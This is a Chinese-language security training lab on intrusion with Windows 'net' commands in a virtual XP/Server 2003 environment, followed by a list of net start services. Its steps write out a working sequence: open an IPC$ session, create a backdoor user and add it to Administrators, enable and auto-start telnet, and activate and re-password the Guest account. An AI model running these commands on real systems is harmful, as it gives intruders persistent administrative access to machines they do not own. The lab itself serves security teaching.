实验二 Net命令入侵 - 图文

实验二 222.28.78.107→信息安全实训→网络安全→课程1 Net命令入侵

实验目的与要求 1、了解NET入侵的过程 2、掌握NET命令的使用方法和它的参数搭配 VPC1(虚拟PC） Windows xp和Windows server2003系统 实VPC1 连接要求 验环软件描述 境 实验环境描述 PC 网络接口，本地连接与实验网络直连 1、学生机要求安装java环境 2、VPC安装Windows xp和Windows server2003系统 XP作为客户端，Windows server 2003作为远程服务器。 打开DOS的方法 DOS命令中的NET命令 NET命令的使用方法和它的参数搭配 预备知识 实验内容 实验步骤 1、学生单击实验拓扑按钮，进入实验场景，单击“打开控制台”按钮，进入目标主机，（第一次启动目标主机，还需要安装java控件），如图所示: 在Windows xp（下面的是客户端）和server 2003（上面是服务器）系统，两人进行实验，相互得知对方的IP及用户名、密码。在此server 2003系统IP为192.168.41.181。此IP地址不固定，通过网上邻居查看服务器地址，或者使用ipconfig命令查看。 2、点击windows xp的“打开控制台”，账号administrator,密码123456，登录到实验场景中的目标主机。 点击windows 2003的“打开控制台”，账号administrator,密码123456，登录到实验场景中的目标主机。如图所示：

3 、登陆windows xp主机：“net use \\\\192.168.41.181\\ipc$ 1 /user:1 ”如下图：

4、 创建一个用户，由于SA的权限相当于系统的超级用户，如：加一个sysusers的用户密码为111111 。输入命令：“net user sysusers 111111 /add”，如下图：

5、显示命令成功后，就可以把他加入Administrators组了，输入命令：“net localgroup Administrators sysusers /add”，如下图：

6、打开对方的TELNET服务命令为：“net start telnet”如下图：

注：“net start telnet”命令正常情况下可以开启对方的“telnet”服务，但是因为对方该服务禁用了，所以需要先把禁用给去掉，然后再启动。

7、将telnet服务设置为“自动”，命令为“sc config tlntsvr start= auto”，需要注意的是，telnet服务在这里一定要用“tlntsvr”，用“sc config telnet start= auto”是无法启动的，另外“=”号后边和“auto”之前要有一个空格，如下图：

8、启动“telnet”服务，命令为“net start telnet”或者用“net start tlntsvr”进行启动，如图：

9、激活Guest用户（guest是windows的默认用户），输入命令：“net user guest /active：yes”

10、把一个用户的密码改掉，把 guest的密码改为111111，其他用户也可以的。只要有权限就可以。执行“net user guest 111111”命令，如下图：

11、退出远程连接命令：“net use * /delete”，如下图：

12、用net命令的帮助时，所有 net 命令接受选项 / yes 和 /no（可缩写为 / y 和 /n ）。/y 对命令产生的任何交互提示自动回答“是”，/n 回答“否”。例如，net stop server 通常提示确认是否根据服务器服务结束所有服务，net stop server /y 自动回答“是”并关闭服务器服务。如下图：

13、提供网络命令列表及帮助主题，或提供指定命令或主题的帮助。如想得到net命令的用法可以用“net /?”查询，如果想知道net命令中“use”的用法，可以直接输入“net use ?”或者“net use help”来进行进一步查询，或者用“net help use”来获得更详细的内容。

如下图：

附：常用的net命令 Net start

启动服务，或显示已启动服务的列表。

net start [service] 启动相关的服务

相关服务包括 alerter、client service for netware、clipbook server、content index、comput er browser、dhcp client、directory replicator、eventlog、ftp publishing service、

hypermedia object manager、logical disk manager、lpdsvc、media services managemen t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw ork dde dsdm、nt lm security support provider、ole、plug and play、remote access connection manager、remote access isnsap service、remote access server、remote pr ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server 、simple tcp/ip services、site server ldap service、smartcard resource manager、s nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking service、tracking (server) service、ups、Windows time service 和 workstation。

下面服务只有在 Windows 2000 上可用：file service for macintosh、gateway service for netware、microsoft dhcp service、print service for macintosh、windows interne t name service。

Net start Alerter

启动“警报器”服务。“警报器”服务发送警告消息。

Net start ClipBook Server

启动“剪贴簿服务器”服务。

本文来源：https://www.bwwdw.com/article/9xna.html